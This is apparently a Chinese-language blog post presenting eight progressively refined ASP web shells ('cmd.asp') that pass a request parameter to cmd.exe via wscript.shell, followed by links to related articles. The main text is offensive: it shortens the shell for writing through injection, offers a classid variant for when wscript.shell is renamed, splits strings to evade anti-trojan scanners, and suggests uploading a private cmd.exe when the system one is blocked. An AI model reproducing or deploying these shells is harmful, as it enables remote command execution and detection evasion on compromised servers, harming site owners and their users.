asp执行cmd实例

最新推荐文章于 2024-09-02 12:37:34 发布
最新推荐文章于 2024-09-02 12:37:34 发布
阅读量9.2k 收藏 3
点赞数
分类专栏: web 文章标签: asp cmd
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:

<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>

用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>

这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp

<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:

<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

当然,classid值在不同系统下有所不同。这个要自行更改

第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:

<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>



<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

这里代码引号里的东东都可以随便拆的,像还可以拆成

<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c "&request("c")).stdout.readall%>

第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:

<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c "&request("c")).stdout.readall%>
第8个,asp代码可以加密吗?
当然可以了
woswod
关注
专栏目录
ASP.Net执行cmd命令的实现代码
10-28
1. 创建Process对象实例:首先,创建一个Process对象,之后将通过这个对象来启动cmd进程。 2. 配置ProcessStartInfo:使用Process对象的StartInfo属性来配置启动进程时的参数。其中,FileName属性设置为"cmd.exe",...
asp.net环境下的cmd命令执行
lake2的专栏
08-03 4033
cmd.asp木马大家一定用过吧。这是一个可以执行cmd命令的asp文件(不过要被杀毒软件追杀^_^)。其原理是用WSCRIPT.SHELL对象调用cmd.exe,然后把返回的信息放到一个临时文件,再利用FSO把临时文件信息读出来显示在浏览器里。 呵呵,在asp.net环境下也是可以写出类似程序的。不过可以不用那些对象。 VB.net里有一个shell函数,可以执行外部程序。呵呵,就是利用它!现看
asp执行dos命令的方法及原理
m0_68479320的博客
04-05 327
ASP执行dos,ASP执行dos命令,ASP执行dos程序,ASP执行dos并显示读取,ASP执行dos返回回显。
掌握ASP:100个实用实例教程
最新发布
weixin_35811662的博客
09-02 789
本文还有配套的精品资源,点击获取 简介:ASP是微软开发的服务器端脚本环境,用于动态网页内容生成。本教程精选100个实例,全面讲解ASP基础、核心概念和应用,通过实践加深学习。涵盖服务器端脚本、ASP组件、脚本语言、ASP指令、内置对象、数据库连接、错误处理、ASP与HTML结合及具体实例应用等多个方面。学完后,你能独立搭建动态网站,处理用户交互,管理数据,并提高网页功能。...
ASP.NET CORE下运行CMD命令
weixin_34037977的博客
02-21 2332
ASP.NET CORE下运行CMD命令,用以前的ASP.NET 的命令System.Diagnostics.Process.Start("notepad");这样是可以运行出记事本的, 现在公司的C++大神开发了个EXE,需要放在服务器上,然后当访问服务器上的某个网页的时候就执行这个EXE了。。 传到服务器上,在服务器上运行 d:/temp/cm/cm...
asp 使用aspexec组件执行 exe
KylinBL的专栏
03-26 3522
http://hi.baidu.com/kk126/blog/item/e44b6b27afc50407918f9d17.html http://www.ly705.cn/blog/archives/20071228/93.html http://www.lilu.name/Html/diannaojishu/2008-7/962025.html aspexe.dll文件
asp木马中的cmd执行
liswa 电脑备忘录
03-24 3459
        以前一直看不懂asp木马中的cmd命令执行。当时如果默认的系统是有可执行属性的话,肯定是不必修改,直接在命令行中写入命令即可,但是如果对方系统的cmd是没有权限的,这时需要我们上传一个cmd.exe上去,放置在可执行的目录下,再在asp木马中制定cmd.exe来执行,这时我就有点困惑了,因为它上面有可几个地方,一个说是路径,一个说是参数,一个说是命令(asp站长助手中只有路径和命令
asp执行带参数的sql语句实例
10-25
在给定的代码实例中,我们可以看到如何在ASP中使用ADODB对象来执行带有参数的SQL查询。首先,创建一个`ADODB.Connection`对象来建立与数据库的连接。这里的连接字符串使用了Microsoft Jet OLEDB 4.0提供程序,指向了...
ASP实例开发源码-批量生成HTML实例程序.zip
11-16
2. 执行查询:创建SQL查询语句,通过Cmd对象执行,获取所需数据。 3. 遍历数据:使用Recordset对象遍历查询结果。 4. 生成HTML:在循环中,将每条数据插入预定义的HTML模板中,形成新的HTML文件。 5. 写入文件:使用...
ASP访问Access实例
07-09
在这个"ASP访问Access实例"中,我们将探讨如何使用ASP来与Microsoft Access数据库进行交互。 在ASP中,我们可以使用ADO(ActiveX Data Objects)组件来连接和操作数据库。ADO提供了一种统一的方式来访问各种数据源...
ASP Shell执行命令小技巧 .doc
12-22
ASP Shell执行命令小技巧 .doc
asp 执行 exe_Web安全:命令执行漏洞
weixin_39767386的博客
11-24 369
命令执行是指攻击者通过浏览器或者其他客户端软件提交一些cmd命令(或者bash命令)至服务器程序,服务器程序通过system、eval及exec等函数直接或者间接地调用cmd.exe执行攻击者提交的命令。命令执行漏洞产生的原因是,开发人员在编写PHP代码时,没有对代码中可执行的特殊函数入口进行过滤,导致客户端可以提交一些cmd命令(或者bash命令),并交由服务器程序执行。服务器程序没有...
cmd.asp [自定cmd.exe地址]
FreeXploiT
10-28 1884
本文作者:lcx文章出处:未知文章性质:原创阅读次数:28发布日期:2004-10-24  end if %> if request("cmdx")="cmd.exe地址,可更改可默认" then response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall end i
Asp.net环境下的cmd命令执行
专栏
03-15 1169
cmd.asp木马大家一定用过吧。这是一个可以执行cmd命令的asp文件(不过要被杀毒软件追杀^_^)。其原理是用wscript.shell对象调用cmd.exe,然后把返回的信息放到一个临时文件,再利用fso把临时文件信息读出来显示在浏览器里。呵呵,在asp.net环境下也是可以写出类似程序的。不过可以不用那些对象。vb.net里有一个shell函数,可以执行外部程序。呵呵,就是利用它!现看看微
asp命令执行语句】_2分钟教你使用ASP.NET CORE创建并发布网页应用
weixin_39835792的博客
12-27 523
>> 点击上方 懒人MES 关注我们准备环境: 只需要下载并安装 .NET CORE SDK 3.1(推荐3.1)微软官方下载地址: https://dotnet.microsoft.com/download/dotnet-core不需要Visual Studio, 也不需要VS Code, 一切操作都只在CMD命令行中完成, 而且只需要执行5条命令,1-2分钟搞定先来看看一...
asp.net执行cmd命令
gzeehg007的博客
06-13 3152
IIS中执行时,可能会有权限问题,应用程序池》高级设置》进程模型》标识  设置用户名和密码 protected void Button1_Click(object sender, EventArgs e)     {         Response.Write(ExeCommand("d:\\qt-faststart.exe d:\\11.mp4 d:\\88.mp4")); 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值